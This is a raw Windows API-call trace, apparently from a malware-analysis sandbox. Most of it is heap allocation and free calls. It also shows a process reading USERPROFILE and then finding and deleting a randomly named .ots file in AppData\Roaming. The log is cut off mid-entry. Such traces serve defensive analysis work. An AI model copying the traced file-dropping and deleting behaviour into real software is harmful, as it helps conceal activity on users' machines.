RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0207.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0207.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0207.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0207.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0207.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0207.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0207.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0207.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0207.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0207.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0207.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0207.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0207.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0207.476] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0207.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.476] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e) returned 0x2420898 [0207.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ynNikGKB3oJVJW2VhiLE.ots", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ynNikGKB3oJVJW2VhiLE.ots", lpFilePart=0x8bedfc*="ynNikGKB3oJVJW2VhiLE.ots") returned 0x46 [0207.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0207.478] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ynNikGKB3oJVJW2VhiLE.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynnikgkb3ojvjw2vhile.ots")) returned 0x2020 [0207.478] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ynNikGKB3oJVJW2VhiLE.ots", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8fec4c0, ftCreationTime.dwHighDateTime=0x1d4cbcc, ftLastAccessTime.dwLowDateTime=0xe923c630, ftLastAccessTime.dwHighDateTime=0x1d4d59b, ftLastWriteTime.dwLowDateTime=0xe923c630, ftLastWriteTime.dwHighDateTime=0x1d4d59b, nFileSizeHigh=0x0, nFileSizeLow=0xf044, dwReserved0=0xeff, dwReserved1=0x4, cFileName="ynNikGKB3oJVJW2VhiLE.ots", cAlternateFileName="YNNIKG~1.OTS")) returned 0xaa5860 [0207.478] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ynNikGKB3oJVJW2VhiLE.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynnikgkb3ojvjw2vhile.ots")) returned 1 [0207.482] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8fec4c0, ftCreationTime.dwHighDateTime=0x1d4cbcc, ftLastAccessTime.dwLowDateTime=0xe923c630, ftLastAccessTime.dwHighDateTime=0x1d4d59b, ftLastWriteTime.dwLowDateTime=0xe923c630, ftLastWriteTime.dwHighDateTime=0x1d4d59b, nFileSizeHigh=0x0, nFileSizeLow=0xf044, dwReserved0=0xeff, dwReserved1=0x4, cFileName="ynNikGKB3oJVJW2VhiLE.ots", cAlternateFileName="YNNIKG~1.OTS")) returned 0 [0207.482] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0207.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.483] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0207.483] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.484] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0207.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e) returned 0x2420898 [0207.487] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ynNikGKB3oJVJW2VhiLE.ots", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ynNikGKB3oJVJW2VhiLE.ots", lpFilePart=0x8bf658*="ynNikGKB3oJVJW2VhiLE.ots") returned 0x46 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0207.487] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ynNikGKB3oJVJW2VhiLE.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynnikgkb3ojvjw2vhile.ots")) returned 0xffffffff [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: 